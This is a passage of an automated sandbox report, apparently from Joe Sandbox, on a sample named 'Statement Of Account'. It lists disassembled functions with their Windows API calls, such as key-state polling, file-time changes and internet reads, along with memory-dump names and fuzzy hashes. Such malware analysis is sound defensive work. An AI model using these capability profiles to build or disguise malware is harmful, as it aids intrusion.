Function 004772DE Relevance: 7.6, APIs: 5, Instructions: 67windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0046DD22: IsWindow.USER32(00000000), ref: 0046DD51

IsWindowVisible.USER32 ref: 00477314
IsWindowEnabled.USER32 ref: 00477324
GetForegroundWindow.USER32(?,?,?,00000001,?,?), ref: 00477331
IsIconic.USER32 ref: 0047733F
IsZoomed.USER32 ref: 0047734D

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: 1c24098bd8cb9da3f496229370c910df04dc27541171caa4f2956f9c30b83eee
Instruction ID: c753cb395bd8887e5e04db90522a3107d7308fd2cfa588f53a4db7a4177bc043
Opcode Fuzzy Hash: 1c24098bd8cb9da3f496229370c910df04dc27541171caa4f2956f9c30b83eee
Instruction Fuzzy Hash: 351172327041119BE3209B26DD05B9FB7A8AF91310F05882EFC49E7250D7B8EC42D7A9

Function 00436D2D Relevance: 7.6, APIs: 5, Instructions: 52filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000,75923220,00000000,00000000,00442E95,?,?,?), ref: 00436D4F
SetFileTime.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000), ref: 00436D8C
CloseHandle.KERNEL32(00000000,?,?,?,00000000), ref: 00436D93

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: 17e11168520f802dddbe8c477e19047108492bf153e6cd976562f268bfda3e60
Instruction ID: bce1a9391340f9688fe0750810cd2cb1b104417d8b3c1e96578cdf6de8724fbd
Opcode Fuzzy Hash: 17e11168520f802dddbe8c477e19047108492bf153e6cd976562f268bfda3e60
Instruction Fuzzy Hash: A4F0C83634132077E5301A69AC8DFCF276CABDAB32F20452EF741A61C083D51445977D

Function 00456354 Relevance: 6.1, APIs: 4, Instructions: 127keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(004A83D8), ref: 0045636A
ScreenToClient.USER32(004A83D8,?), ref: 0045638A
GetAsyncKeyState.USER32(?), ref: 004563D0
GetAsyncKeyState.USER32(?), ref: 004563DC

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: 8b6f1a7d11e91e3692d621cb91ecba55955a7a9a0de246f0cd2a62484a80ce0b
Instruction ID: 0eacbf52c9ff4b21db6d2500407d28a57be55752a0539e191fb639d8ee6a043b
Opcode Fuzzy Hash: 8b6f1a7d11e91e3692d621cb91ecba55955a7a9a0de246f0cd2a62484a80ce0b
Instruction Fuzzy Hash: 8E416071108341ABD724DF55CD84EBBB7E9EF86725F540B0EB8A543281C734A848CB6A

Function 0045058D Relevance: 6.1, APIs: 4, Instructions: 98nativeCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 004505BF
NtdllDialogWndProc_W.NTDLL(?,00000138,?,?,004A83D8,?,004A83D8,?), ref: 00450610
NtdllDialogWndProc_W.NTDLL(?,00000133,?,?,004A83D8,?,004A83D8,?), ref: 0045065A
NtdllDialogWndProc_W.NTDLL(?,00000134,?,?,004A83D8,?,004A83D8,?), ref: 00450688

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: DialogNtdllProc_$Parent
String ID:
API String ID: 3146699748-0
Opcode ID: 93bb19dea30658450b5dada9832e261aba4ffbe4fc891123e7e77a8d6405a749
Instruction ID: e3e31f905615dd8bfbe674c7a91f48f64006a8638b4dc9b760805e547d05c650
Opcode Fuzzy Hash: 93bb19dea30658450b5dada9832e261aba4ffbe4fc891123e7e77a8d6405a749
Instruction Fuzzy Hash: 8C3128362411006BC2209B299C58DBB7B58EBC7336F14465BFA54832D3CB769826C768

Function 00446566 Relevance: 5.9, Strings: 4, Instructions: 868COMMON

Download Yara Rule

Strings

VUUU, xrefs: 00446968
VUUU, xrefs: 00446942
VUUU, xrefs: 004469C7
ERCP, xrefs: 0044664A

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID:
String ID: ERCP$VUUU$VUUU$VUUU
API String ID: 0-2165971703
Opcode ID: fe5f619ecbbb89e409f3ebcf557090f4afc22d0cdf4dbad8df8e547bb5c0b5b7
Instruction ID: 514654dd073cfe12bfc68f6c44a091d7a3824994b709b832431b3f3de6bbd106
Opcode Fuzzy Hash: fe5f619ecbbb89e409f3ebcf557090f4afc22d0cdf4dbad8df8e547bb5c0b5b7
Instruction Fuzzy Hash: 5562D3716087818BE734CF18C8807ABB7E1EBC6314F154A2FE49986390E779D949CB5B

Function 0045C999 Relevance: 4.6, APIs: 3, Instructions: 130fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045C9BE
FindNextFileW.KERNEL32(00000000,?), ref: 0045CA1B
FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CA4A

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: cd42767256c3935660832567e39f7af9e021373ba4cf75ddba00705dd7020de4
Instruction ID: 18858b47483a38653cd59612877c1399ad483e9f26b014a4aa46912757e3bc7b
Opcode Fuzzy Hash: cd42767256c3935660832567e39f7af9e021373ba4cf75ddba00705dd7020de4
Instruction Fuzzy Hash: EC41CE756003009FC720EF79D880A9BB3E4FF89315F208A6EED698B391D775A844CB95

Function 00436ADE Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(00000001,00000000), ref: 00436AEF
FindFirstFileW.KERNEL32(00000001,?), ref: 00436B00
FindClose.KERNEL32(00000000), ref: 00436B13

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: 9dc85b775151a348b3ed896f2b5842869c214baa03f23a1e311506cc1954de59
Instruction ID: 417b6d6de692ea6945bae3bf725251b28653fd5bce93257cef0f58e2a105c1b1
Opcode Fuzzy Hash: 9dc85b775151a348b3ed896f2b5842869c214baa03f23a1e311506cc1954de59
Instruction Fuzzy Hash: 23E02236804418678600AB7CAC0C4EE779CDB0A335F100B96FE38C21D0D775A9408FEA

Function 00443390 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 004433A2

Part of subcall function 00414CEF: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,004341DB,00000000,?,0044248A,?,?,?,0048B850), ref: 00414CFA
Part of subcall function 00414CEF: __aulldiv.LIBCMT ref: 00414D1A

Strings

rJ, xrefs: 00443399

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: Time$FileSystem__aulldiv__time64
String ID: rJ
API String ID: 2893107130-1865492326
Opcode ID: e603e75d0767fd135478995c8e8d26e9f594f0c4df67822259ddb38eb763753e
Instruction ID: ebc1a5536eae3429eadb0b33e849de59894c076497330b79c1ff8485d89898ec
Opcode Fuzzy Hash: e603e75d0767fd135478995c8e8d26e9f594f0c4df67822259ddb38eb763753e
Instruction Fuzzy Hash: B721A2336205108BF321CF36CC41652B7E7EBE0314F268A6AE4A5973C5CA797906CB98

Function 00443391 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 004433A2

Part of subcall function 00414CEF: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,004341DB,00000000,?,0044248A,?,?,?,0048B850), ref: 00414CFA
Part of subcall function 00414CEF: __aulldiv.LIBCMT ref: 00414D1A

Strings

rJ, xrefs: 00443399

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: Time$FileSystem__aulldiv__time64
String ID: rJ
API String ID: 2893107130-1865492326
Opcode ID: e8e365b2ab883cc854990c78a2143569adcb81f7322f31e235de15ec19987b7e
Instruction ID: 4b4e0c3debee0a45c2bc781276f994e79ac96c452fb6cf924f1e6ade5adf298d
Opcode Fuzzy Hash: e8e365b2ab883cc854990c78a2143569adcb81f7322f31e235de15ec19987b7e
Instruction Fuzzy Hash: E82187336345108BF321CF36CC4165277E3EBE0314B258B6AD4A5973C5CA797906CB88

Function 0044289D Relevance: 3.1, APIs: 2, Instructions: 82networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(?,?,?,?,00000000,00000000), ref: 004428C2
InternetReadFile.WININET(?,00000000,?,?), ref: 004428F9

Part of subcall function 0044286A: GetLastError.KERNEL32(00000000,0044AA07,?,00000000,00000000,00000001,?,?), ref: 00442880

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: Internet$AvailableDataErrorFileLastQueryRead
String ID:
API String ID: 901099227-0
Opcode ID: c5651eff999419169b46b76971b5abcb261cf656e183e849eb3ab7268b4b60d7
Instruction ID: 2c15810e60b1cb59304632cc8162977c32d0240baa2dcf3c2cd6ef22f942a6bb
Opcode Fuzzy Hash: c5651eff999419169b46b76971b5abcb261cf656e183e849eb3ab7268b4b60d7
Instruction Fuzzy Hash: 452174B12043016BF220EF56DD45FAFB3E8ABD4715F40492EF285A6180D7B8E949C76A

Function 00469995 Relevance: 3.1, APIs: 2, Instructions: 62nativeCOMMON

Download Yara Rule

APIs

NtdllDialogWndProc_W.NTDLL(?,00000114,00000000,?,?,?,?,?,004A83D8,?), ref: 00469A31

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: DialogNtdllProc_
String ID:
API String ID: 3239928679-0
Opcode ID: dc39a28d6584410e7e9d39be8fdef0c21f65586a3d31f41dfecdd17b11510ed2
Instruction ID: 5414628f158ba78a046d4a24b655e4ccbf4c8d46c3d310d0e0a8d963d1b880b8
Opcode Fuzzy Hash: dc39a28d6584410e7e9d39be8fdef0c21f65586a3d31f41dfecdd17b11510ed2
Instruction Fuzzy Hash: B4115932700150ABE610CA59EC44E7BB79DEBCA725F14815FF68093282DBB96C05D77B

Function 0045DD7C Relevance: 3.1, APIs: 2, Instructions: 56fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045DDA1
FindClose.KERNEL32(00000000), ref: 0045DDDD

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: eac1d012b3ae473636f11b903683455954ec17c127a785734040b224e9a5f79e
Instruction ID: 3577cc1601137e614a3334ffa73c6d258275d41fe8d72aaca367a27ef3e2a016
Opcode Fuzzy Hash: eac1d012b3ae473636f11b903683455954ec17c127a785734040b224e9a5f79e
Instruction Fuzzy Hash: DE11E5766002049FD710EF6ADC89A5AF7E5EF84325F10892EF958D7281CB75E8048B94

Function 00447A87 Relevance: 3.1, APIs: 2, Instructions: 53nativewindowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000401,00000000,00000000), ref: 00447AE5
NtdllDialogWndProc_W.NTDLL(?,0000002B,?,?,004A83D8,?), ref: 00447B09

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: DialogMessageNtdllProc_Send
String ID:
API String ID: 3814093946-0
Opcode ID: 282f86207f84fb720c1c146b20eb36cb5bd987ddbd5c6a609029bff053d642d3
Instruction ID: cf0c3d739a266ecf9dfb39524e393d8b6385858120b34e0c7784725de632f42e
Opcode Fuzzy Hash: 282f86207f84fb720c1c146b20eb36cb5bd987ddbd5c6a609029bff053d642d3
Instruction Fuzzy Hash: 8F01DB323002509BD320DF48D888F6BB769EBDA725F14492EFA409B280C7B5B806C775

Function 00461EB0 Relevance: 3.0, APIs: 2, Instructions: 48nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 00456354: GetCursorPos.USER32(004A83D8), ref: 0045636A
Part of subcall function 00456354: ScreenToClient.USER32(004A83D8,?), ref: 0045638A
Part of subcall function 00456354: GetAsyncKeyState.USER32(?), ref: 004563D0
Part of subcall function 00456354: GetAsyncKeyState.USER32(?), ref: 004563DC

NtdllDialogWndProc_W.NTDLL(?,00000201,?,?,004A83D8,00000000,00000001,004A83D8,?), ref: 00461F01
NtdllDialogWndProc_W.NTDLL(?,00000204,?,00000000,004A83D8,00000000,00000001,004A83D8,?), ref: 00461F21

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: AsyncDialogNtdllProc_State$ClientCursorScreen
String ID:
API String ID: 2121657457-0
Opcode ID: a8825b0a69f284e0c5f8ab03e6ab6924ca40bb3ee268c2d78caca0fc9fe2bfa7
Instruction ID: 18d9c50e6c24968168519bdb59aa32127fc81338cec1df6736236d991af0d7d7
Opcode Fuzzy Hash: a8825b0a69f284e0c5f8ab03e6ab6924ca40bb3ee268c2d78caca0fc9fe2bfa7
Instruction Fuzzy Hash: 1C01A272201320ABE6149A4A9C59D7BB3ACEBCA712F04481FF64193192C7B96810C779

Function 004331D9 Relevance: 3.0, APIs: 2, Instructions: 35nativeCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 00433202
NtdllDialogWndProc_W.NTDLL(?,00000200,?), ref: 0043322F

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: ClientDialogNtdllProc_Screen
String ID:
API String ID: 3420055661-0
Opcode ID: 8e2001f9d1191b047fdc261eecd0625cae7c1ad5e6a69bec7795623591e4d7bc
Instruction ID: 79334b24f5e752891c7b85279833e8fa03bb884f24ead4a413b07d40b8d8150b
Opcode Fuzzy Hash: 8e2001f9d1191b047fdc261eecd0625cae7c1ad5e6a69bec7795623591e4d7bc
Instruction Fuzzy Hash: 22F0F4B6504311AFE200DF05ED8492BB7E8EBC8712F148D2EF99193251C7B4A909DBB6

Function 0044AF5C Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,00000000,00000FFF,00000000,?,?,004782E6,?,?,?), ref: 0044AF8E
FormatMessageW.KERNEL32(00001000,00000000,?,00000000,00000000,00000FFF,00000000,?,?,004782E6,?,?,?), ref: 0044AFA5

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
